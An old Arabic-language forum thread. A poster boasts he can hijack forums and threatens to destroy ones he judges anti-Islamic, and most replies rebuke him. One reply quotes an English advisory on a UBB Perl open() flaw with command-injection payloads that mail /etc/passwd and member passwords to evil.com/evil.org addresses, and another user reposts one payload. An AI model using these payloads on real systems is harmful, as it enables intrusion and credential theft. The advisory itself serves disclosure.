الثغرة الأمنية في المنتديات وكيفية الإختراق

[هكرز المنتديات]

السلام عليكم ورحمة الله وبركاته

كيف حالكم يا شباب ووفق الله صاحب هذا المنتدى القيم ..... وحتى لا أطيل في كلامي سأقول لكم خبر توصلت اليه وهو أني تمكنت عن طريق برنامج وأعتقد أن البرنامج موجود عند أغلب مستخدمي الإنترنت وأنا لا أريد الإفصاح عن اسم البرنامج وإنما حبييت أخبركم بهذا الخبر الفظيع الذي توصلت اليه فقط للمعلومية 0 وأن لا شيء مستحيل في هذه الدنيا وأنا لن أقوم بعرض طريقة الإختراق أو كيفية أخذ باسوورد المنتدى والسيطرة عليه لأن هذا فساد وحرام قبل كل شيء أو لكي أعرض مقدرتي على الهكرز وأن الله سيحاسبني عاجلاً أم آجلاً اذا فعلت ذلك وإنما فقط لتحذروا .
والموضوع هو أني تمكنت من الوصول الى طريقة تمكنك من الدخول والتحكم والسيطرة على أي منتدى تريده ومعرفة كلمة السر الخاصة بصاحب المنتدى وكما تعلمون بقية الأرقام السرية للأعضاء وهذا بإختصار شديد
أيضا كما توصلت الى طريقة تمكنك من أخذ نسخة كاملة من المنتدى الى جهازك ومن ثم الى موقع طبعا وأنت تغير الباقي على كيفك .
وأنا والله فعلت هذا على المنتدى الخاص بي وبعض المنتديات الغير عربية حتى لا أتسبب في خراب المنتديات العربية أثناء تجربتي وبحمد الله توصلت الى الطريقة وكما يقولون الحاجة ام الإختراع .

وثقوا تماما أني لن أسرق أي منتدى كان عربي أو انجليزي لأنه كما سبق وأن قلت أن هذا العمل حرام وإنما الذي دعاني لفعل هذا فقط للتجربة وحتى ترو برنامج منتديات أخرى أقوى من اليو بي بي وها أنا أحاول في عملية اختراق أو على الأقل الوصول الى كلمة السر لمنتدى مصمم عن طريق برنامج مثل البرنامج المستخدم في الساحة والله يسامح الجميع ان الله غفور رحيم .

ملاحظة / أنا سأستخدم أسلوب تدمير المنتدى للذين لا يخافون من الله ولايحسبون لله حساب قبحهم الله في مواضيعهم السخيفة .

والسلام عليكم ورحمة الله وبركاته


------------------

[Wanted]

عزيزي الهكرز .. الطريقة اللي ذكرتها بتكون فعالة اذا كان المنتدي يسمح بالـ HTML COde
وتزداد الطين بلة اذا كان هناك عداد للزيارت بدعم الـ SSI

اما اذا لم يسمح بالـ HTML وكانت الاصدارة حديثة اختراق المنتدى لا اعتقد بيكون بنفس السهولة .. انما لحصول على الملفات فهذا امر هين اذا لم يكن المستضيف يفرض حماية على ملفات الي جي اي

[بريد الليل]

اخي الهاكرز
خبر سار فعلا.
مبروك عليك وعلينا.
تمخض الجبل فولد فأرا!
الم يكن من الافضل ان تصرف وقتك فيما يفيد اخوتك بدل التهديد بتدمير منتدياتهم. من اعطاك الاذن والحق في اصدار الفتاوي فيمن هو على الدين الصحيح او من هو حاد عنه؟ هل لديك تفويض الهي للقيام بهذه المهمة؟ ما مستوى علمك ومعارفك الدينية وما درجتك بين العلماء والفقهاء والمجتهدين؟ كم كتابا الفت في علوم الدين والفقه والشريعة؟

يا اخي اخجل من نفسك قليلا ان كانت في نفسك بقايا خجل وحشمة.
ادعو لك بالهداية.

[هكرز المنتديات]

أولا بالنسبة للأخ wanted
أنا أقول لك أني استطعت أخذ باسوورد المنتدى حقي اللي أنا ركبته على السيرفر http://www.virtualave.net بكل سهولة مع أنه بصيغة السي جي ايه
أو بأي صيغة مهماً كانت وشكرا لك عزيزي .

ثانياً بالنسبة للأخ المحترم بريد الليل
أنا أقول لك يا أخي الكريم ليش هذا الأسلوب في كلامك وأنت تعلم أن هذا مجرد ابداء رأي أو تبادل معلومات تفيدك وتفيد غيرك كما أني أنا أستفيد منكم وأنا سبق وأن قلت في حديثِ هذا بأني أنا لا أستعرض عضلاتي في مقدرتي للإختراق وانما لكي يكون الجميع على حرص ووعي بما يجري في عالم النت ما رأيكم يا أعضاء هل في كلامي غلط أو تجريح ولعلمك الشديد أنا الذي دعاني كما تدعوا بأني أضيع وقتي في شيء لايفيد أنا أعمل لدى جهاز أمن الإنترنت ومن حقي أن أجري تجارب لمعرفة الثغرات الأمنية في الإنترنت واذا كنت تبحث عن شيء تستفيد منه فانتظر مني كل جديد ومفيد ولا تستعجل بس ماهو كل شيء لازم يكون شيء تستفيد منه ملموس وشكرا لك عزيزي على رأيك على كل حال ومافي أي زعل . وأنا بس حبييت أخبرك بالنسبة لكلاميفي تدمير المنتديات التي تسيء الى الإسلام ليس كل فإنه ليس كل منتدى سيتم تدميره بسهولة وانما عندما نسمع أن جميع أو أغلبية الموجودين على النت يشكون من منتدى معين يسيئ الى الإسلام وذلك أيضا بعد أخذ الإذن من كبار العلماء بعد اطلاعهم على المواضيع وأنا أعلم أني أنا وأنت وغيري لانقدر بشيء أما علمائنا المسلمين حفظهم الله والله يهدي الجميع لما فيه خير لأمتنا الإسلامية وشكرا

[فار الانترنت]

السلام عليكم
اخي العزيز هاكرز المنتديات الرجاء التواصل معي لشيء اريدك ان تساعدني في اصلاحه ، وذلك لانك قلت انك طورت شيء ما
ولك جزيل الشكر
سلالالالالالالالالالام
طبعا بريدي هو :
ahmad@cool.com.jo
سلالالالالالالام

[ولد الإمارات]

اخي هكرز المنتديات تابعت موضوعك ولم اجد فيه اي فايده من طرحه والذي استنتجته من كلامك انك تعمل لنا عرض قوى لا اكثر انك لم تطرح طرق الحمايه ولا حتى طرق الهك التي تتبعها حتى يطور او يجلب غيرك طرق الحمايه ان كنت انت لا تعرف كيف الحمايه لكن هذا حلنا اخي هاهاهاها
واسمحولي على ماسبق ياشباب بس هذي حقيقه

[aljish]

الي المسمي نفسه هكر المنتديات.

من الطبيعي ان تري الكم الهائل من الانتقادات لك. لانك لم تقوم بعرض معلومات قيمه قيد نستفيد منها نحن رواد المنتدي. لكنك انت جيت وعارض عضلاتك علينا نحن. واحنا عرفين وانت عارف انك هذا الاشياء يعاقب عليها القانون. واذا كانت حجتك انهم يسبون الاسلام فهناك المواقع مشاء الله ما تقدر انت ولا انا يمسها. بس تستطيع ان تحجبها وهذا اعتقد كفايه. بس قولي المنتديات الي انت تبي تدمرها عربيه او غربيه.لاني لم اري اي منتدي عربي يسب الاسلام.

[بريد الليل]

السلام عليكم

بالاضافة الى الطريقة التي اكتشفتها جهز رجاء البلطة والمسدس لتنضم الى قتلة الابرياء في مصر والجزائر باسم الدفاع عن الاسلام. مالفرق بين تدمير منتدى لان احدهم نشر فيه مشاركة فيها رأي مخالف لرأيك وبين قتل انسان لمجرد انه يختلف معك في الرأي؟

انت تسئ للاسلام العظيم من حيث لاتدري. فاسلامنا يدعو لمحاورة الضالين وضعيفي الايمان بالمجادلة والكلمة الطيبة وليس بقتلهم او بتدمير المجلة او الجريدة او المنتدى الذي نشروا فيه كلماتهم.

ثم انك تنسى شيئا مهما : لاتزر وازرة وزر اخرى. لاتقل لي ليس في اسلامنا مثل هذا. فكيف تعاقب اصحاب المنتدى على شئ اقترفه اخرون؟ لو نشرت انا هنا شيئا مسيئا سيبقى ظاهرا للعموم لساعات او لأيام قبل ان ينتبه اليه المشرف ويحذفه، فهل يجب تدمير منتدى سوالف في هذه الحالة؟ تذكر ان لا احد من المشرفين على المنتديات متفرغ للبحلقة في شاشة الكومبيوتر طوال 24 ساعة، وهكذا ستجد دائما مشاركات تفلت من حين لاخر في هذا المنتدى او ذاك وهي مخالفة لقواعد النشر في المنتديات، ولو طبقنا قانونك لتوجب تدمير جميع المنتديات العربية بلا استثناء. فهل تريد ان يكون لك شرف الحصول على لقب "عشماوي المنتديات"؟

وازيدنك على الشعر الذي نظمته بيتا: المعلومات عن اختراق لوحات النقاش مبذولة في الانترنيت واليك احدها وهي خاصة باختراق النسخة المجانية من ubb وقد وجدتها في موقع متخصص في الحماية من الثغرات الامنية في مختلف البرامج. تفضل واقرأ:

"Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.
Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.
I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:
ubb_library.pl:901-902
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
writing it ? Girls ?)
And the $ThreadFile takes its value directly from the hidden (hmm!)
field `topic'.
So when I filled the form with
topic='012345.ubb|mail hacker@evil.com </etc/passwd|'
It happily gives me /etc/passwd. And
topic='012345.ubb|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in cleartext!).
So one should only open "reply" form in the forum, save it to disk,
and set topic field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).
The fix is obvious. But the rule of the thumb is "do not use magic perl open".
At least in cgi scripts. If you want to open regular file, sysopen does
the trick as well.
And again: CHECK EVERYTHING!
Regards,
SerG.
P.S. Vendor was notified."

[PIANO]

حرااام عليكم فشلتوا الرجال

[انتربوي]

topic='012345.ubb|cat Members/*|mail hacker@evil.org|'

[انتربوي]

ما صار شي
يا هاكر المنتديات عندي لك حركات واااجد
انت راسلني بس اقول لك
تقدر تمسح المنتدى كله بكبسه زر
انت راسلني وانا باطلبك طلب لا تخاف ما ابي طريقتك لكن باسالك بعدين باطلبك واقول لك الطرق

------------------
انتربوي.....تعرفني ولا لا ما يهم

[الحلبي]

اخى هكرز المنتديات
سلام عليكم
موضوعك ممتاز ومافيه اي غلط، ومو عيب انو الانسان يتوصل لشي معين ويعرضه على الناس، لكن لاتنسى انو في بشر تحسد،، الله لا يبلانا..

[محمد]

السلام على من اتبع الهدى

أنا أضم صوتي إلى صوت الأخ بريد الليل.........
فلو كان هكرز المنتديات يهتم بأمور الإسلام على الإنترنت لما أخبر أحداً بما اكتشف ، حتى لا يؤدي للبلبة في أوساط المنتديات العربية ، و على فكرة فإن تخريب المنتديات و المواقع ليس من الإسلام ، فإذا كان يريد فعلاً عمل ما يقول عنه لسعى و راء المنتديات التي تسعى ضد الإسلام دون أن يخبر أحداً خشية وصول أحد لهذه الطريقة، و على أي حال ، فلم أسمع في حياتي عن منتدى يسب الإسلام و يشهر به ، و إلى الأخ هكرز المنتديات اتقي الله فيما عندك.

و السلام عليكم

[ولد الإمارات]

السلام عليكم الحلبي اخي الله يخليك اي موضوع ممتاز الله يهديك واي حسد تتكلم عنه للعلم اذا كان هو توصل لشي اكيد مش من عبقريته المواقع التي تتكلم وتشرح طرق الهك بانواعها تارسه الانترنت كل ماعليك تقرا وتسحب البرنامج
لكن اذا فيه فايده وموضوع ممتاز خل يكتب طرق الحمايه مثل ما قلت قبل او على الاقل يذكر اماكن ضعف هذي المنتديات حتى الناس تبحث عن حل وتعرف شوه عيوب هذي المنتديات اما اني اكتب كلام بس والله انا اقدر اسوي وسويت هذا عباره عن عرض عضلات بس انا بعد اقدر اقول اني اقدر اخلي المنتديات تكتب هندي للذي مايفهم عربي دام الشي هو كلام ينكتب بس
الله يعينكم والله ويصلح طريقة تفكير هذي النوعيه من البشر

[mubarmej]

الشرها على بعض الناس اللي سوو من المخترقين عباقرة المجتمع وقاداته !

كل واحد قبل لا يفتح منتدى ناجح ويصير عنده عدد كبير من الزوار ( المغفلين ) حاشاكم لازم يخترق منتدى فلان الفلاني المساكين علشان يثبت شطارته، ولكن مثل ما يقول المثل ( لو فيه خير ما طقوه )

الله يعين بعض الناس على العقد اللي حايشتهم !

وأحب أن أنوه بشده إلى أن كلامي ليس موجها إلى شخص ما بذاته، وبالذات الأخ ( هكرز المنتديات ) أنا لا أوجه كلامي لك أبدا وأرجو أن لا تفهمني خطئا ولكنني كنت أوضح لك سبب التهجم الذي لقيه موضوعك، لأن الناس بدأت تصير عندهم حساسية و ( حرة ) من المخترقين ويعتقدون إن المخترق هو عبقري العباقرة بينما هو مثله مثل النشالين اللي يقدرون يفتحون ( حقيبة يدوية ) أو ( خزنة ) هل هؤلاء عباقرة أم ماذا؟ إنما المجتمع الفاسد تنتشفر فيه هالأخبار، وتلقاه يعرف يعمل الحركة ولكنه أصلا مو فاهم ليش الحركة هذي قاعدة تصير وليش قاعد تنفع وشنو معناتها !

والله من وراء القصد